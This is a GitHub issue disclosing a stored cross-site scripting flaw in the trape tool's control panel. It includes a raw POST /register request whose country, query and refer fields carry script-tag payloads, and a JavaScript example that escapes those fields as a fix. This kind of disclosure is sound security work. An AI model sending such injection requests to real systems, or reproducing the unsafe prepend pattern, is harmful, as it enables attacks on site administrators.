
Stored XSS in static/js/trape.js

Open teeann opened this issue 6 years ago • 0 comments

Overview

User input is embedded in the admin interface through jQuery's unsafe prepend() method. This leads to a Cross-site Scripting attack. The vulnerability is in https://github.com/jofpin/trape/blob/master/static/js/trape.js#L594. The vulnerable parameters are country, query, and refer, sent in the POST /register request.

Proof of concept

  1. `python trape.py --url example.com --port 8080`
  2. Send the following HTTP request:

```http
POST /register HTTP/1.1
Host: <victim_url>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 332
Connection: close
Referer: <victim_url>

vId=&vURL=&as=CMS&city=Hanoi&country=<script>alert(1)</script>&countryCode=VN&isp=CMCTELECOM&lat=21.0313&lon=105.8516&org=CMC+Telecom+Infrastructure+Company&query=<script>alert(2)</script>&region=HN&regionName=Hanoi&status=success&timezone=Asia%2FHo_Chi_Minh&zip=&cpu=architecture+%3A+amd64+-+4+Cores&refer=<script>alert(3)</script>
```

  3. Open the Control Panel link; we see the alert() box.

teeann, Jun 15 '19 05:06
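The mitigation for the report above, as an added JavaScript example (not code from the trape project): parse a /register body the way the server receives it and HTML-escape every user-controlled field before it is concatenated into the visitor row that the panel prepends. The sample body, the shown-field list and the function names are constructed for this example; the unsafe pattern shown in the comment is illustrative, not trape's exact line.

```javascript
// Added example, not trape's own code: render the /register fields with
// every user-controlled value escaped, so markup in country/query/refer is
// displayed as text in the admin panel instead of being executed.

// Constructed sample body using the field names from the report's request.
const SAMPLE_BODY =
  'vId=&vURL=&as=CMS&city=Hanoi&country=<script>alert(1)</script>' +
  '&countryCode=VN&org=CMC+Telecom+Infrastructure+Company' +
  '&query=<script>alert(2)</script>&refer=<script>alert(3)</script>';

// Decode application/x-www-form-urlencoded into a plain object
// ('+' becomes a space, %XX sequences are decoded).
function parseRegisterBody(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Escape the five characters that let a value break out of an HTML text or
// attribute context; every user-controlled value passes through this
// before it is concatenated into markup.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Unsafe shape the report describes (illustrative, not trape's exact line):
//   $('#visitors').prepend('<tr><td>' + data.country + '</td>...</tr>');
// Safe variant below: same row, each field escaped first. In the browser the
// equivalent is $('<td>').text(data.country), which never parses the value.
const SHOWN_FIELDS = ['city', 'country', 'org', 'query', 'refer'];

function renderVisitorRow(fields) {
  const cells = SHOWN_FIELDS
    .map((name) => `<td data-field="${name}">${escapeHtml(fields[name] || '')}</td>`)
    .join('');
  return `<tr>${cells}</tr>`;
}

// True if any '<' other than the row's own <tr>/<td> tags survives, i.e. a
// tag from user input reached the markup unescaped.
function leaksMarkup(html) {
  return /<(?!\/?t[rd]\b)/.test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  const row = renderVisitorRow(parseRegisterBody(SAMPLE_BODY));
  console.log(row);
  console.log('raw tag from input present:', leaksMarkup(row)); // false
}
```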